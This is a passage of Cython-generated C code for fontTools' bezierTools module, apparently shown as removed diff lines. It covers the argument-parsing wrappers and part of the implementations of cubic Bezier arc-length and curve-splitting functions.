__pyx_tuple__57 __pyx_mstate_global->__pyx_tuple__57 -#define __pyx_tuple__59 __pyx_mstate_global->__pyx_tuple__59 -#define __pyx_tuple__61 __pyx_mstate_global->__pyx_tuple__61 -#define __pyx_tuple__63 __pyx_mstate_global->__pyx_tuple__63 -#define __pyx_tuple__65 __pyx_mstate_global->__pyx_tuple__65 -#define __pyx_tuple__67 __pyx_mstate_global->__pyx_tuple__67 -#define __pyx_tuple__69 __pyx_mstate_global->__pyx_tuple__69 -#define __pyx_tuple__71 __pyx_mstate_global->__pyx_tuple__71 -#define __pyx_tuple__73 __pyx_mstate_global->__pyx_tuple__73 -#define __pyx_tuple__75 __pyx_mstate_global->__pyx_tuple__75 -#define __pyx_tuple__77 __pyx_mstate_global->__pyx_tuple__77 -#define __pyx_tuple__79 __pyx_mstate_global->__pyx_tuple__79 -#define __pyx_tuple__81 __pyx_mstate_global->__pyx_tuple__81 -#define __pyx_tuple__83 __pyx_mstate_global->__pyx_tuple__83 -#define __pyx_tuple__85 __pyx_mstate_global->__pyx_tuple__85 -#define __pyx_tuple__87 __pyx_mstate_global->__pyx_tuple__87 -#define __pyx_tuple__89 __pyx_mstate_global->__pyx_tuple__89 -#define __pyx_tuple__92 __pyx_mstate_global->__pyx_tuple__92 -#define __pyx_tuple__94 __pyx_mstate_global->__pyx_tuple__94 -#define __pyx_tuple__95 __pyx_mstate_global->__pyx_tuple__95 -#define __pyx_tuple__97 __pyx_mstate_global->__pyx_tuple__97 -#define __pyx_tuple__99 __pyx_mstate_global->__pyx_tuple__99 -#define __pyx_codeobj__3 __pyx_mstate_global->__pyx_codeobj__3 -#define __pyx_codeobj__7 __pyx_mstate_global->__pyx_codeobj__7 -#define __pyx_tuple__101 __pyx_mstate_global->__pyx_tuple__101 -#define __pyx_codeobj__13 __pyx_mstate_global->__pyx_codeobj__13 -#define __pyx_codeobj__16 __pyx_mstate_global->__pyx_codeobj__16 -#define __pyx_codeobj__18 __pyx_mstate_global->__pyx_codeobj__18 -#define __pyx_codeobj__20 __pyx_mstate_global->__pyx_codeobj__20 -#define __pyx_codeobj__22 __pyx_mstate_global->__pyx_codeobj__22 -#define __pyx_codeobj__24 __pyx_mstate_global->__pyx_codeobj__24 -#define __pyx_codeobj__25 __pyx_mstate_global->__pyx_codeobj__25 -#define __pyx_codeobj__27 __pyx_mstate_global->__pyx_codeobj__27 -#define __pyx_codeobj__29 __pyx_mstate_global->__pyx_codeobj__29 -#define __pyx_codeobj__31 __pyx_mstate_global->__pyx_codeobj__31 -#define __pyx_codeobj__33 __pyx_mstate_global->__pyx_codeobj__33 -#define __pyx_codeobj__35 __pyx_mstate_global->__pyx_codeobj__35 -#define __pyx_codeobj__37 __pyx_mstate_global->__pyx_codeobj__37 -#define __pyx_codeobj__39 __pyx_mstate_global->__pyx_codeobj__39 -#define __pyx_codeobj__41 __pyx_mstate_global->__pyx_codeobj__41 -#define __pyx_codeobj__43 __pyx_mstate_global->__pyx_codeobj__43 -#define __pyx_codeobj__45 __pyx_mstate_global->__pyx_codeobj__45 -#define __pyx_codeobj__47 __pyx_mstate_global->__pyx_codeobj__47 -#define __pyx_codeobj__49 __pyx_mstate_global->__pyx_codeobj__49 -#define __pyx_codeobj__51 __pyx_mstate_global->__pyx_codeobj__51 -#define __pyx_codeobj__54 __pyx_mstate_global->__pyx_codeobj__54 -#define __pyx_codeobj__56 __pyx_mstate_global->__pyx_codeobj__56 -#define __pyx_codeobj__58 __pyx_mstate_global->__pyx_codeobj__58 -#define __pyx_codeobj__60 __pyx_mstate_global->__pyx_codeobj__60 -#define __pyx_codeobj__62 __pyx_mstate_global->__pyx_codeobj__62 -#define __pyx_codeobj__64 __pyx_mstate_global->__pyx_codeobj__64 -#define __pyx_codeobj__66 __pyx_mstate_global->__pyx_codeobj__66 -#define __pyx_codeobj__68 __pyx_mstate_global->__pyx_codeobj__68 -#define __pyx_codeobj__70 __pyx_mstate_global->__pyx_codeobj__70 -#define __pyx_codeobj__72 __pyx_mstate_global->__pyx_codeobj__72 -#define __pyx_codeobj__74 __pyx_mstate_global->__pyx_codeobj__74 -#define __pyx_codeobj__76 __pyx_mstate_global->__pyx_codeobj__76 -#define __pyx_codeobj__78 __pyx_mstate_global->__pyx_codeobj__78 -#define __pyx_codeobj__80 __pyx_mstate_global->__pyx_codeobj__80 -#define __pyx_codeobj__82 __pyx_mstate_global->__pyx_codeobj__82 -#define __pyx_codeobj__84 __pyx_mstate_global->__pyx_codeobj__84 -#define __pyx_codeobj__86 __pyx_mstate_global->__pyx_codeobj__86 -#define __pyx_codeobj__88 __pyx_mstate_global->__pyx_codeobj__88 -#define __pyx_codeobj__90 __pyx_mstate_global->__pyx_codeobj__90 -#define __pyx_codeobj__93 __pyx_mstate_global->__pyx_codeobj__93 -#define __pyx_codeobj__96 __pyx_mstate_global->__pyx_codeobj__96 -#define __pyx_codeobj__98 __pyx_mstate_global->__pyx_codeobj__98 -#define __pyx_codeobj__100 __pyx_mstate_global->__pyx_codeobj__100 -#define __pyx_codeobj__102 __pyx_mstate_global->__pyx_codeobj__102 -/* #### Code section: module_code ### */ - -/* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_1calcCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_calcCubicArcLength, "calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005)\nCalculates the arc length for a cubic Bezier segment.\n\n Whereas :func:`approximateCubicArcLength` approximates the length, this\n function calculates it by \"measuring\", recursively dividing the curve\n until the divided segments are shorter than ``tolerance``.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n tolerance: Controls the precision of the calcuation.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_1calcCubicArcLength = {"calcCubicArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_1calcCubicArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_calcCubicArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_1calcCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_tolerance = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicArcLength (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_tolerance,0}; - values[4] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)((PyObject*)__pyx_float_0_005))); - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, 1); __PYX_ERR(0, 56, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, 2); __PYX_ERR(0, 56, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, 3); __PYX_ERR(0, 56, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tolerance); - if (value) { values[4] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicArcLength") < 0)) __PYX_ERR(0, 56, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - __pyx_v_tolerance = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, __pyx_nargs); __PYX_ERR(0, 56, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_calcCubicArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_tolerance); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_calcCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_tolerance) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - int __pyx_t_8; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicArcLength", 1); - - /* "fontTools/misc/bezierTools.py":70 - * Arc length value. - * """ - * return calcCubicArcLengthC( # <<<<<<<<<<<<<< - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4), tolerance - * ) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 70, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":71 - * """ - * return calcCubicArcLengthC( - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4), tolerance # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_8 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_8 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[6] = {__pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7, __pyx_v_tolerance}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_8, 5+__pyx_t_8); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 70, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_3_split_cubic_into_two(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_2_split_cubic_into_two, "_split_cubic_into_two(p0, p1, p2, p3)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_3_split_cubic_into_two = {"_split_cubic_into_two", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_3_split_cubic_into_two, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_2_split_cubic_into_two}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_3_split_cubic_into_two(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_p0 = 0; - PyObject *__pyx_v_p1 = 0; - PyObject *__pyx_v_p2 = 0; - PyObject *__pyx_v_p3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_split_cubic_into_two (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_p0,&__pyx_n_s_p1,&__pyx_n_s_p2,&__pyx_n_s_p3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p0)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, 1); __PYX_ERR(0, 75, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, 2); __PYX_ERR(0, 75, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, 3); __PYX_ERR(0, 75, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_split_cubic_into_two") < 0)) __PYX_ERR(0, 75, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_p0 = values[0]; - __pyx_v_p1 = values[1]; - __pyx_v_p2 = values[2]; - __pyx_v_p3 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 75, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_cubic_into_two", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_2_split_cubic_into_two(__pyx_self, __pyx_v_p0, __pyx_v_p1, __pyx_v_p2, __pyx_v_p3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_2_split_cubic_into_two(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_p0, PyObject *__pyx_v_p1, PyObject *__pyx_v_p2, PyObject *__pyx_v_p3) { - PyObject *__pyx_v_mid = NULL; - PyObject *__pyx_v_deriv3 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_split_cubic_into_two", 1); - - /* "fontTools/misc/bezierTools.py":76 - * - * def _split_cubic_into_two(p0, p1, p2, p3): - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 # <<<<<<<<<<<<<< - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_p1, __pyx_v_p2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_t_1, 3, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_v_p0, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_p3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_0_125); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_mid = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":77 - * def _split_cubic_into_two(p0, p1, p2, p3): - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 # <<<<<<<<<<<<<< - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_p3, __pyx_v_p2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_p1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_p0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - 